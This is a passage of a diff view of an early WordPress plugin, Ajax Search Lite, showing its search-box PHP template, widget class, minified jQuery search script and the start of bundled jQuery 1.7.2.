get_option('asl_showsearchinposts')!=1 &&
|
20 |
+
get_option('asl_showsearchinpages')!=1
|
21 |
+
)?true:false);
|
22 |
+
?>
|
23 |
+
<div id='ajaxsearchlite'>
|
24 |
+
<div class="probox">
|
25 |
+
<div class='proinput'>
|
26 |
+
<input type='text' name='phrase' value='' />
|
27 |
+
<span class='loading'></span>
|
28 |
+
</div>
|
29 |
+
<div class='promagnifier'>
|
30 |
+
</div>
|
31 |
+
<div class='prosettings' <?php echo ($settingsHidden?"style='display:none;'":""); ?>opened=0>
|
32 |
+
</div>
|
33 |
+
<div class='proloading'>
|
34 |
+
</div>
|
35 |
+
</div>
|
36 |
+
<div id='ajaxsearchlitesettings' class="searchsettings">
|
37 |
+
<form name='options'>
|
38 |
+
<div class="option<?php echo ((get_option('asl_showexactmatches')!=1)?" hiddend":""); ?>">
|
39 |
+
<input type="checkbox" value="checked" id="set_exactonly<?php echo $id; ?>" name="set_exactonly" <?php echo ((get_option('asl_exactonly')==1)?'checked="checked"':''); ?>/>
|
40 |
+
<label for="set_exactonly<?php echo $id; ?>"></label>
|
41 |
+
</div>
|
42 |
+
<div class="label<?php echo ((get_option('asl_showexactmatches')!=1)?" hiddend":""); ?>">
|
43 |
+
<?php echo get_option('asl_exactmatchestext'); ?>
|
44 |
+
</div>
|
45 |
+
<div class="option hiddend"); ?>">
|
46 |
+
<input type="checkbox" value="None" id="set_intitle<?php echo $id; ?>" name="set_intitle" <?php echo ((get_option('asl_searchintitle')==1)?'checked="checked"':''); ?>/>
|
47 |
+
<label for="set_intitle<?php echo $id; ?>"></label>
|
48 |
+
</div>
|
49 |
+
<div class="label hiddend"); ?>">
|
50 |
+
|
51 |
+
</div>
|
52 |
+
<div class="option hiddend"); ?>">
|
53 |
+
<input type="checkbox" value="None" id="set_incontent<?php echo $id; ?>" name="set_incontent" <?php echo ((get_option('asl_searchincontent')==1)?'checked="checked"':''); ?>/>
|
54 |
+
<label for="set_incontent<?php echo $id; ?>"></label>
|
55 |
+
</div>
|
56 |
+
<div class="label hiddend"); ?>">
|
57 |
+
|
58 |
+
</div>
|
59 |
+
<div class="option<?php echo ((get_option('asl_showsearchinposts')!=1)?" hiddend":""); ?>">
|
60 |
+
<input type="checkbox" value="None" id="set_inposts<?php echo $id; ?>" name="set_inposts" <?php echo ((get_option('asl_searchinposts')==1)?'checked="checked"':''); ?>/>
|
61 |
+
<label for="set_inposts<?php echo $id; ?>"></label>
|
62 |
+
</div>
|
63 |
+
<div class="label<?php echo ((get_option('asl_showsearchinposts')!=1)?" hiddend":""); ?>">
|
64 |
+
<?php echo get_option('asl_searchinpoststext'); ?>
|
65 |
+
</div>
|
66 |
+
<div class="option<?php echo ((get_option('asl_showsearchinpages')!=1)?" hiddend":""); ?>">
|
67 |
+
<input type="checkbox" value="None" id="set_inpages<?php echo $id; ?>" name="set_inpages" <?php echo ((get_option('asl_searchinpages')==1)?'checked="checked"':''); ?>/>
|
68 |
+
<label for="set_inpages<?php echo $id; ?>"></label>
|
69 |
+
</div>
|
70 |
+
<div class="label<?php echo ((get_option('asl_showsearchinpages')!=1)?" hiddend":""); ?>">
|
71 |
+
<?php echo get_option('asl_searchinpagestext'); ?>
|
72 |
+
</div>
|
73 |
+
</form>
|
74 |
+
</div>
|
75 |
+
</div>
|
76 |
+
<div id='ajaxsearchliteres'>
|
77 |
+
<div class="scrollbar"><div class="track"><div class="thumb"><div class="end"></div></div></div></div>
|
78 |
+
<div class="results viewport">
|
79 |
+
<div class="resdrg overview">
|
80 |
+
</div>
|
81 |
+
</div>
|
82 |
+
</div>
|
83 |
+
<script>
|
84 |
+
asljQuery(document).ready(function() {
|
85 |
+
asljQuery("#ajaxsearchlite").ajaxsearchpro({
|
86 |
+
itemscount: <?php echo get_option('asl_itemscount'); ?>,
|
87 |
+
imagewidth: 70,
|
88 |
+
imageheight: 70,
|
89 |
+
resultitemheight: 70,
|
90 |
+
showauthor: <?php echo get_option('asl_showauthor'); ?>,
|
91 |
+
showdate: <?php echo get_option('asl_showdate'); ?>,
|
92 |
+
showdescription: 1,
|
93 |
+
charcount: <?php echo get_option('asl_charcount'); ?>,
|
94 |
+
noresultstext: 'No results!',
|
95 |
+
didyoumeantext: 'Did you mean?',
|
96 |
+
highlight: 0,
|
97 |
+
highlightwholewords: 0,
|
98 |
+
resultareaclickable: <?php echo get_option('asl_resultareaclickable'); ?>
|
99 |
+
});
|
100 |
+
});
|
101 |
+
</script>
|
102 |
+
<?php
|
103 |
+
|
104 |
+
$return = ob_get_clean();
|
105 |
+
return $return;
|
106 |
+
}
|
107 |
+
|
108 |
+
?>
|
includes/widgets.php
ADDED
@@ -0,0 +1,45 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<?php
|
2 |
+
class AjaxSearchLiteWidget extends WP_Widget
|
3 |
+
{
|
4 |
+
function AjaxSearchLiteWidget()
|
5 |
+
{
|
6 |
+
$widget_ops = array('classname' => 'AjaxSearchLiteWidget', 'description' => 'Displays the Ajax Search Lite!' );
|
7 |
+
$this->WP_Widget('AjaxSearchLiteWidget', 'Ajax Search Lite', $widget_ops);
|
8 |
+
}
|
9 |
+
function form($instance)
|
10 |
+
{
|
11 |
+
global $wpdb;
|
12 |
+
if (isset($wpdb->base_prefix)) {
|
13 |
+
$_prefix = $wpdb->base_prefix;
|
14 |
+
} else {
|
15 |
+
$_prefix = $wpdb->prefix;
|
16 |
+
}
|
17 |
+
$instance = wp_parse_args( (array) $instance, array( 'title' => '' ) );
|
18 |
+
$title = $instance['title'];
|
19 |
+
|
20 |
+
?>
|
21 |
+
<p><label for="<?php echo $this->get_field_id('title'); ?>">Title: <input class="widefat" id="<?php echo $this->get_field_id('title'); ?>" name="<?php echo $this->get_field_name('title'); ?>" type="text" value="<?php echo attribute_escape($title); ?>" /></label></p>
|
22 |
+
|
23 |
+
<?php
|
24 |
+
}
|
25 |
+
function update($new_instance, $old_instance)
|
26 |
+
{
|
27 |
+
$instance = $old_instance;
|
28 |
+
$instance['title'] = $new_instance['title'];
|
29 |
+
return $instance;
|
30 |
+
}
|
31 |
+
function widget($args, $instance)
|
32 |
+
{
|
33 |
+
extract($args, EXTR_SKIP);
|
34 |
+
echo $before_widget;
|
35 |
+
$title = empty($instance['title']) ? ' ' : apply_filters('widget_title', $instance['title']);
|
36 |
+
if (!empty($title))
|
37 |
+
echo $before_title . $title . $after_title;;
|
38 |
+
// WIDGET CODE GOES HERE
|
39 |
+
echo do_shortcode("[wpdreams_ajaxsearchlite]");
|
40 |
+
echo $after_widget;
|
41 |
+
}
|
42 |
+
}
|
43 |
+
|
44 |
+
add_action( 'widgets_init', create_function('', 'return register_widget("AjaxSearchLiteWidget");') );
|
45 |
+
?>
|
js/jquery.ajaxsearchpro.min.js
ADDED
@@ -0,0 +1 @@
|
|
|
1 |
+
(function(e){function n(){return!!("ontouchstart"in window)?1:0}var t={init:function(r){var i=e.extend({},this,t);i.searching=false;i.o=e.extend({},r);i.n=new Object;i.n.container=e(this);i.n.probox=e(".probox",this);i.n.proinput=e(".proinput",this);i.n.text=e(".proinput input",this);i.n.loading=e(".proinput .loading",this);i.n.proloading=e(".proloading",this);i.n.promagnifier=e(".promagnifier",this);i.n.prosettings=e(".prosettings",this);i.n.searchsettings=e(".searchsettings",this);i.n.resultsDiv=e(this).next();i.n.items=e(".item",i.n.resultsDiv);i.n.results=e(".results",i.n.resultsDiv);i.n.resdrg=e(".resdrg",i.n.resultsDiv);i.n.drag=e(".resdrg",i.n.resultsDiv);i.o.id=i.n.container.attr("id").match(/^ajaxsearchpro(.*)/)[1];i.cleanUp();i.n.resultsDiv.appendTo("body");i.n.searchsettings.appendTo("body");if(e.browser.msie&&e.browser.version<9){i.n.searchsettings.addClass("ie78")}i.n.resultsDiv.css({opacity:0});e(document).bind("click",function(){i.hideResults();i.hideSettings()});e(this).bind("click",function(e){e.stopImmediatePropagation()});i.n.resultsDiv.bind("click",function(e){e.stopImmediatePropagation()});i.n.searchsettings.bind("click",function(e){e.stopImmediatePropagation()});i.scroll=i.n.results.mCustomScrollbar({scrollButtons:{enable:true,scrollType:"pixels",scrollSpeed:parseInt(i.o.resultitemheight),scrollAmount:parseInt(i.o.resultitemheight)},callbacks:{onScroll:function(){if(n())return;var t=parseInt(e(".mCSB_container",i.n.results).position().top);scr=t%(i.o.resultitemheight+3)-t==0&&Math.abs(t)%(i.o.resultitemheight+3)<i.o.resultitemheight/2+3?"first":-(Math.abs(t)%(i.o.resultitemheight+3))-t;if(Math.abs(t)%(i.o.resultitemheight+3)>i.o.resultitemheight/2){if(scr!="first")scr+=i.o.resultitemheight+3;e(".mCSB_container",i.n.resultsDiv).animate({top:-scr})}else{e(".mCSB_container",i.n.resultsDiv).animate({top:-scr})}}}});i.n.prosettings.click(function(){if(i.n.prosettings.attr("opened")==0){i.showSettings()}else{i.hideSettings()}});var s;e(window).bind("resize",function(){i.resize()});e(window).bind("scroll",function(){i.scrolling(false)});e(window).trigger("resize");e(window).trigger("scroll");i.n.promagnifier.click(function(){clearTimeout(s);s=setTimeout(function(){i.search();s=null},700)});i.n.text.keyup(function(){i.n.promagnifier.trigger("click")});return i},destroy:function(){return this.each(function(){var n=e.extend({},this,t);e(window).unbind(n)})},searchfor:function(t){e(".proinput input",this).val(t).trigger("keyup")},search:function(){var n=e.extend({},this,t);if(n.searching&&0)return;if(n.n.text.val().length<n.o.charcount)return;n.searching=true;n.n.proloading.css({visibility:"visible"});n.hideSettings();n.hideResults();var r={action:"ajaxsearchpro_search",s:n.n.text.val(),id:n.o.id,options:e("form",n.n.searchsettings).serialize()};jQuery.post(ajaxsearchpro.ajaxurl,r,function(t){n.n.resdrg.html("");if(t.nores!=null&&t.keywords!=null){var r=n.o.noresultstext+" "+n.o.didyoumeantext+"<br>";for(var i=0;i<t.keywords.length;i++){r=r+"<span class='keyword'>"+t.keywords[i]+"</span>"}n.n.resdrg.append("<div class='nores'>"+r+"</div>");e(".keyword",n.n.resdrg).bind("click",function(){n.n.text.val(e(this).html());n.n.promagnifier.trigger("click")})}else if(t.length>0){for(var i=0;i<t.length;i++){var s="";var o="";var u="";var a="";if(t[i].image!=null&&t[i].image!=""){s=" <div class='image' style='width:"+n.o.imagewidth+"px;height:"+n.o.imageheight+"px;'> <img src='"+t[i].image+"'> </div>"}if(n.o.showauthor==1){u="<span class='author'>"+t[i].author+"</span>"}if(n.o.showdate==1){a="<span class='date'>"+t[i].date+"</span>"}if(n.o.showdescription==1){o=t[i].content}var f="item_"+n.o.id+"_"+i;var l="";if(n.o.resultareaclickable==1){l="<span class='overlap'></span>"}var c=" <div class='item' id='"+f+"' style='height:"+n.o.resultitemheight+"px;'> "+s+" <div class='content' style='height:"+n.o.resultitemheight+"px;'> <h3><a href='"+t[i].link+"'>"+t[i].title+l+"</a></h3> <div class='etc'>"+u+" "+a+"</div> <p class='desc'>"+o+"</p> </div> <div class='clear'></div> </div>";c=e(c);n.n.resdrg.append(c)}}else{n.n.resdrg.append("<div class='nores'>"+n.o.noresultstext+"</div>")}n.n.items=e(".item",n.n.resultsDiv);n.showResults();n.n.proloading.css({visibility:"hidden"})},"json")},showResults:function(){var n=e.extend({},this,t);n.scrolling(true);var r=n.n.resultsDiv.position().top;n.n.resultsDiv.css({top:r-100,opacity:0,visibility:"visible"}).animate({top:r,opacity:1});if(n.n.items.length>0){var i=n.n.items.length<n.o.itemscount?n.n.items.length:n.o.itemscount;n.n.results.css({height:i*n.n.items.outerHeight(true)+3});n.scroll.mCustomScrollbar("update");n.scroll.mCustomScrollbar("scrollTo","first",{callback:false});if(n.o.highlight==1){var s=n.o.highlightwholewords==1?true:false;n.n.resultsDiv.highlight(n.n.text.val().split(" "),{element:"span",className:"highlighted",wordsOnly:s})}}n.resize();if(n.n.items.length==0){var o=e(".nores",n.n.results).outerHeight(true)>n.o.resultitemheight?n.o.resultitemheight:e(".nores",n.n.results).outerHeight(true);n.n.results.css({height:11110});n.scroll.mCustomScrollbar("update");n.n.results.css({height:e(".nores",n.n.results).outerHeight(true)})}n.scrolling(true);n.searching=false},hideResults:function(){var n=e.extend({},this,t);n.n.resultsDiv.animate({opacity:0},{complete:function(){e(this).css({visibility:"hidden"})}})},showSettings:function(){var n=e.extend({},this,t);n.scrolling(true);n.n.searchsettings.css({opacity:0,visibility:"visible",top:"-=50px"});n.n.searchsettings.animate({opacity:1,top:"+=50px"});n.n.prosettings.attr("opened",1)},hideSettings:function(){var n=e.extend({},this,t);n.n.searchsettings.animate({opacity:0},{complete:function(){e(this).css({visibility:"hidden"})}});n.n.prosettings.attr("opened",0)},cleanUp:function(){var n=e.extend({},this,t);e("body>#ajaxsearchprosettings"+n.o.id).remove();e("body>#ajaxsearchprores"+n.o.id).remove()},resize:function(){var n=e.extend({},this,t);n.n.proinput.css({width:n.n.probox.width()-8-(n.n.proinput.outerWidth()-n.n.proinput.width())-n.n.proloading.outerWidth(true)-n.n.prosettings.outerWidth(true)-n.n.promagnifier.outerWidth(true)-10});if(n.n.prosettings.attr("opened")!=0){n.n.searchsettings.css({display:"block",top:n.n.prosettings.offset().top+n.n.prosettings.height()-2,left:n.n.prosettings.offset().left+n.n.prosettings.width()-n.n.searchsettings.width()})}if(n.n.resultsDiv.css("visibility")!="hidden"){n.n.resultsDiv.css({width:n.n.container.width()-(n.n.resultsDiv.outerWidth(true)-n.n.resultsDiv.width()),top:n.n.container.offset().top+n.n.container.outerHeight(true)+10,left:n.n.container.offset().left});e(".content",n.n.items).each(function(){var t=e(this).prev().css("display")=="none"?0:e(this).prev().outerWidth(true);e(this).css({width:e(this.parentNode).width()-e(this).prev().outerWidth(true)-e(this).outerWidth()+e(this).width()})})}},scrolling:function(n){var r=e.extend({},this,t);if(n==true||r.n.searchsettings.css("visibility")=="visible"){r.n.searchsettings.css({display:"block",top:r.n.prosettings.offset().top+r.n.prosettings.height()-2,left:r.n.prosettings.offset().left+r.n.prosettings.width()-r.n.searchsettings.width()})}if(n==true||r.n.resultsDiv.css("visibility")=="visible"){r.n.resultsDiv.css({width:r.n.container.width()-(r.n.resultsDiv.outerWidth(true)-r.n.resultsDiv.width()),top:r.n.container.offset().top+r.n.container.outerHeight(true)+10,left:r.n.container.offset().left});e(".content",r.n.items).each(function(){var t=e(this).prev().css("display")=="none"?0:e(this).prev().outerWidth(true);e(this).css({width:e(this.parentNode).width()-e(this).prev().outerWidth(true)-e(this).outerWidth()+e(this).width()})})}}};e.fn.ajaxsearchpro=function(n){if(t[n]){return t[n].apply(this,Array.prototype.slice.call(arguments,1))}else if(typeof n==="object"||!n){return t.init.apply(this,arguments)}else{e.error("Method "+n+" does not exist on jQuery.ajaxsearchpro")}}})(jQuery)
|
js/nomin/asljquery.js
ADDED
@@ -0,0 +1,4 @@
|
|
|
|
|
|
|
|
|
1 |
+
/*! jQuery v1.7.2 jquery.com | jquery.org/license */
|
2 |
+
(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g++){if(g===1)for(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l+" "+k,n=e[m]||e["* "+k];if(!n){p=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1]+" "+k];if(p){o=e[o],o===!0?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No conversion from "+m.replace(" "," to ")),n!==!0&&(c=n?n(c):p(o(c)))}}return c}function ca(a,c,d){var e=a.contents,f=a.dataTypes,g=a.responseFields,h,i,j,k;for(i in g)i in d&&(c[g[i]]=d[i]);while(f[0]==="*")f.shift(),h===b&&(h=a.mimeType||c.getResponseHeader("content-type"));if(h)for(i in e)if(e[i]&&e[i].test(h)){f.unshift(i);break}if(f[0]in d)j=f[0];else{for(i in d){if(!f[0]||a.converters[i+" "+f[0]]){j=i;break}k||(k=i)}j=j||k}if(j){j!==f[0]&&f.unshift(j);return d[j]}}function b_(a,b,c,d){if(f.isArray(b))f.each(b,function(b,e){c||bD.test(a)?d(a,e):b_(a+"["+(typeof e=="object"?b:"")+"]",e,c,d)});else if(!c&&f.type(b)==="object")for(var e in b)b_(a+"["+e+"]",b[e],c,d);else d(a,b)}function b$(a,c){var d,e,g=f.ajaxSettings.flatOptions||{};for(d in c)c[d]!==b&&((g[d]?a:e||(e={}))[d]=c[d]);e&&f.extend(!0,a,e)}function bZ(a,c,d,e,f,g){f=f||c.dataTypes[0],g=g||{},g[f]=!0;var h=a[f],i=0,j=h?h.length:0,k=a===bS,l;for(;i<j&&(k||!l);i++)l=h[i](c,d,e),typeof l=="string"&&(!k||g[l]?l=b:(c.dataTypes.unshift(l),l=bZ(a,c,d,e,l,g)));(k||!l)&&!g["*"]&&(l=bZ(a,c,d,e,"*",g));return l}function bY(a){return function(b,c){typeof b!="string"&&(c=b,b="*");if(f.isFunction(c)){var d=b.toLowerCase().split(bO),e=0,g=d.length,h,i,j;for(;e<g;e++)h=d[e],j=/^\+/.test(h),j&&(h=h.substr(1)||"*"),i=a[h]=a[h]||[],i[j?"unshift":"push"](c)}}}function bB(a,b,c){var d=b==="width"?a.offsetWidth:a.offsetHeight,e=b==="width"?1:0,g=4;if(d>0){if(c!=="border")for(;e<g;e+=2)c||(d-=parseFloat(f.css(a,"padding"+bx[e]))||0),c==="margin"?d+=parseFloat(f.css(a,c+bx[e]))||0:d-=parseFloat(f.css(a,"border"+bx[e]+"Width"))||0;return d+"px"}d=by(a,b);if(d<0||d==null)d=a.style[b];if(bt.test(d))return d;d=parseFloat(d)||0;if(c)for(;e<g;e+=2)d+=parseFloat(f.css(a,"padding"+bx[e]))||0,c!=="padding"&&(d+=parseFloat(f.css(a,"border"+bx[e]+"Width"))||0),c==="margin"&&(d+=parseFloat(f.css(a,c+bx[e]))||0);return d+"px"}function bo(a){var b=c.createElement("div");bh.appendChild(b),b.innerHTML=a.outerHTML;return b.firstChild}function bn(a){var b=(a.nodeName||"").toLowerCase();b==="input"?bm(a):b!=="script"&&typeof a.getElementsByTagName!="undefined"&&f.grep(a.getElementsByTagName("input"),bm)}function bm(a){if(a.type==="checkbox"||a.type==="radio")a.defaultChecked=a.checked}function bl(a){return typeof a.getElementsByTagName!="undefined"?a.getElementsByTagName("*"):typeof a.querySelectorAll!="undefined"?a.querySelectorAll("*"):[]}function bk(a,b){var c;b.nodeType===1&&(b.clearAttributes&&b.clearAttributes(),b.mergeAttributes&&b.mergeAttributes(a),c=b.nodeName.toLowerCase(),c==="object"?b.outerHTML=a.outerHTML:c!=="input"||a.type!=="checkbox"&&a.type!=="radio"?c==="option"?b.selected=a.defaultSelected:c==="input"||c==="textarea"?b.defaultValue=a.defaultValue:c==="script"&&b.text!==a.text&&(b.text=a.text):(a.checked&&(b.defaultChecked=b.checked=a.checked),b.value!==a.value&&(b.value=a.value)),b.removeAttribute(f.expando),b.removeAttribute("_submit_attached"),b.removeAttribute("_change_attached"))}function bj(a,b){if(b.nodeType===1&&!!f.hasData(a)){var c,d,e,g=f._data(a),h=f._data(b,g),i=g.events;if(i){delete h.handle,h.events={};for(c in i)for(d=0,e=i[c].length;d<e;d++)f.event.add(b,c,i[c][d])}h.data&&(h.data=f.extend({},h.data))}}function bi(a,b){return f.nodeName(a,"table")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function U(a){var b=V.split("|"),c=a.createDocumentFragment();if(c.createElement)while(b.length)c.createElement(b.pop());return c}function T(a,b,c){b=b||0;if(f.isFunction(b))return f.grep(a,function(a,d){var e=!!b.call(a,d,a);return e===c});if(b.nodeType)return f.grep(a,function(a,d){return a===b===c});if(typeof b=="string"){var d=f.grep(a,function(a){return a.nodeType===1});if(O.test(b))return f.filter(b,d,!c);b=f.filter(b,d)}return f.grep(a,function(a,d){return f.inArray(a,b)>=0===c})}function S(a){return!a||!a.parentNode||a.parentNode.nodeType===11}function K(){return!0}function J(){return!1}function n(a,b,c){var d=b+"defer",e=b+"queue",g=b+"mark",h=f._data(a,d);h&&(c==="queue"||!f._data(a,e))&&(c==="mark"||!f._data(a,g))&&setTimeout(function(){!f._data(a,e)&&!f._data(a,g)&&(f.removeData(a,d,!0),h.fire())},0)}function m(a){for(var b in a){if(b==="data"&&f.isEmptyObject(a[b]))continue;if(b!=="toJSON")return!1}return!0}function l(a,c,d){if(d===b&&a.nodeType===1){var e="data-"+c.replace(k,"-$1").toLowerCase();d=a.getAttribute(e);if(typeof d=="string"){try{d=d==="true"?!0:d==="false"?!1:d==="null"?null:f.isNumeric(d)?+d:j.test(d)?f.parseJSON(d):d}catch(g){}f.data(a,c,d)}else d=b}return d}function h(a){var b=g[a]={},c,d;a=a.split(/\s+/);for(c=0,d=a.length;c<d;c++)b[a[c]]=!0;return b}var c=a.document,d=a.navigator,e=a.location,f=function(){function J(){if(!e.isReady){try{c.documentElement.doScroll("left")}catch(a){setTimeout(J,1);return}e.ready()}}var e=function(a,b){return new e.fn.init(a,b,h)},f=a.jQuery,g=a.$,h,i=/^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,j=/\S/,k=/^\s+/,l=/\s+$/,m=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,n=/^[\],:{}\s]*$/,o=/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,p=/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,q=/(?:^|:|,)(?:\s*\[)+/g,r=/(webkit)[ \/]([\w.]+)/,s=/(opera)(?:.*version)?[ \/]([\w.]+)/,t=/(msie) ([\w.]+)/,u=/(mozilla)(?:.*? rv:([\w.]+))?/,v=/-([a-z]|[0-9])/ig,w=/^-ms-/,x=function(a,b){return(b+"").toUpperCase()},y=d.userAgent,z,A,B,C=Object.prototype.toString,D=Object.prototype.hasOwnProperty,E=Array.prototype.push,F=Array.prototype.slice,G=String.prototype.trim,H=Array.prototype.indexOf,I={};e.fn=e.prototype={constructor:e,init:function(a,d,f){var g,h,j,k;if(!a)return this;if(a.nodeType){this.context=this[0]=a,this.length=1;return this}if(a==="body"&&!d&&c.body){this.context=c,this[0]=c.body,this.selector=a,this.length=1;return this}if(typeof a=="string"){a.charAt(0)!=="<"||a.charAt(a.length-1)!==">"||a.length<3?g=i.exec(a):g=[null,a,null];if(g&&(g[1]||!d)){if(g[1]){d=d instanceof e?d[0]:d,k=d?d.ownerDocument||d:c,j=m.exec(a),j?e.isPlainObject(d)?(a=[c.createElement(j[1])],e.fn.attr.call(a,d,!0)):a=[k.createElement(j[1])]:(j=e.buildFragment([g[1]],[k]),a=(j.cacheable?e.clone(j.fragment):j.fragment).childNodes);return e.merge(this,a)}h=c.getElementById(g[2]);if(h&&h.parentNode){if(h.id!==g[2])return f.find(a);this.length=1,this[0]=h}this.context=c,this.selector=a;return this}return!d||d.jquery?(d||f).find(a):this.constructor(d).find(a)}if(e.isFunction(a))return f.ready(a);a.selector!==b&&(this.selector=a.selector,this.context=a.context);return e.makeArray(a,this)},selector:"",jquery:"1.7.2",length:0,size:function(){return this.length},toArray:function(){return F.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this[this.length+a]:this[a]},pushStack:function(a,b,c){var d=this.constructor();e.isArray(a)?E.apply(d,a):e.merge(d,a),d.prevObject=this,d.context=this.context,b==="find"?d.selector=this.selector+(this.selector?" ":"")+c:b&&(d.selector=this.selector+"."+b+"("+c+")");return d},each:function(a,b){return e.each(this,a,b)},ready:function(a){e.bindReady(),A.add(a);return this},eq:function(a){a=+a;return a===-1?this.slice(a):this.slice(a,a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(F.apply(this,arguments),"slice",F.call(arguments).join(","))},map:function(a){return this.pushStack(e.map(this,function(b,c){return a.call(b,c,b)}))},end:function(){return this.prevObject||this.constructor(null)},push:E,sort:[].sort,splice:[].splice},e.fn.init.prototype=e.fn,e.extend=e.fn.extend=function(){var a,c,d,f,g,h,i=arguments[0]||{},j=1,k=arguments.length,l=!1;typeof i=="boolean"&&(l=i,i=arguments[1]||{},j=2),typeof i!="object"&&!e.isFunction(i)&&(i={}),k===j&&(i=this,--j);for(;j<k;j++)if((a=arguments[j])!=null)for(c in a){d=i[c],f=a[c];if(i===f)continue;l&&f&&(e.isPlainObject(f)||(g=e.isArray(f)))?(g?(g=!1,h=d&&e.isArray(d)?d:[]):h=d&&e.isPlainObject(d)?d:{},i[c]=e.extend(l,h,f)):f!==b&&(i[c]=f)}return i},e.extend({noConflict:function(b){a.$===e&&(a.$=g),b&&a.jQuery===e&&(a.jQuery=f);return e},isReady:!1,readyWait:1,holdReady:function(a){a?e.readyWait++:e.ready(!0)},ready:function(a){if(a===!0&&!--e.readyWait||a!==!0&&!e.isReady){if(!c.body)return setTimeout(e.ready,1);e.isReady=!0;if(a!==!0&&--e.readyWait>0)return;A.fireWith(c,[e]),e.fn.trigger&&e(c).trigger("ready").off("ready")}},bindReady:function(){if(!A){A=e.Callbacks("once memory");if(c.readyState==="complete")return setTimeout(e.ready,1);if(c.addEventListener)c.addEventListener("DOMContentLoaded",B,!1),a.addEventListener("load",e.ready,!1);else if(c.attachEvent){c.attachEvent("onreadystatechange",B),a.attachEvent("onload",e.ready);var b=!1;try{b=a.frameElement==null}catch(d){}c.documentElement.doScroll&&b&&J()}}},isFunction:function(a){return e.type(a)==="function"},isArray:Array.isArray||function(a){return e.type(a)==="array"},isWindow:function(a){return a!=null&&a==a.window},isNumeric:function(a){return!isNaN(parseFloat(a))&&isFinite(a)},type:function(a){return a==null?String(a):I[C.call(a)]||"object"},isPlainObject:function(a){if(!a||e.type(a)!=="object"||a.nodeType||e.isWindow(a))return!1;try{if(a.constructor&&!D.call(a,"constructor")&&!D.call(a.constructor.prototype,"isPrototypeOf"))return!1}catch(c){return!1}var d;for(d in a);return d===b||D.call(a,d)},isEmptyObject:function(a){for(var b in a)return!1;return!0},error:function(a){throw new Error(a)},parseJSON:function(b){if(typeof b!="string"||!b)return null;b=e.trim(b);if(a.JSON&&a.JSON.parse)return a.JSON.parse(b);if(n.test(b.replace(o,"@").replace(p,"]").replace(q,"")))return(new Function("return "+b))();e.error("Invalid JSON: "+b)},parseXML:function(c){if(typeof c!="string"||!c)return null;var d,f;try{a.DOMParser?(f=new DOMParser,d=f.parseFromString(c,"text/xml")):(d=new ActiveXObject("Microsoft.XMLDOM"),d.async="false",d.loadXML(c))}catch(g){d=b}(!d||!d.documentElement||d.getElementsByTagName("parsererror").length)&&e.error("Invalid XML: "+c);return d},noop:function(){},globalEval:function(b){b&&j.test(b)&&(a.execScript||function(b){a.eval.call(a,b)})(b)},camelCase:function(a){return a.replace(w,"ms-").replace(v,x)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toUpperCase()===b.toUpperCase()},each:function(a,c,d){var f,g=0,h=a.length,i=h===b||e.isFunction(a);if(d){if(i){for(f in a)if(c.apply(a[f],d)===!1)break}else for(;g<h;)if(c.apply(a[g++],d)===!1)break}else if(i){for(f in a)if(c.call(a[f],f,a[f])===!1)break}else for(;g<h;)if(c.call(a[g],g,a[g++])===!1)break;return a},trim:G?function(a){return a==null?"":G.call(a)}:function(a){return a==null?"":(a+"").replace(k,"").replace(l,"")},makeArray:function(a,b){var c=b||[];if(a!=null){var d=e.type(a);a.length==null||d==="string"||d==="function"||d==="regexp"||e.isWindow(a)?E.call(c,a):e.merge(c,a)}return c},inArray:function(a,b,c){var d;if(b){if(H)return H.call(b,a,c);d=b.length,c=c?c<0?Math.max(0,d+c):c:0;for(;c<d;c++)if(c in b&&b[c]===a)return c}return-1},merge:function(a,c){var d=a.length,e=0;if(typeof c.length=="number")for(var f=c.length;e<f;e++)a[d++]=c[e];else while(c[e]!==b)a[d++]=c[e++];a.length=d;return a},grep:function(a,b,c){var d=[],e;c=!!c;for(var f=0,g=a.length;f<g;f++)e=!!b(a[f],f),c!==e&&d.push(a[f]);return d},map:function(a,c,d){var f,g,h=[],i=0,j=a.length,k=a instanceof e||j!==b&&typeof j=="number"&&(j>0&&a[0]&&a[j-1]||j===0||e.isArray(a));if(k)for(;i<j;i++)f=c(a[i],i,d),f!=null&&(h[h.length]=f);else for(g in a)f=c(a[g],g,d),f!=null&&(h[h.length]=f);return h.concat.apply([],h)},guid:1,proxy:function(a,c){if(typeof c=="string"){var 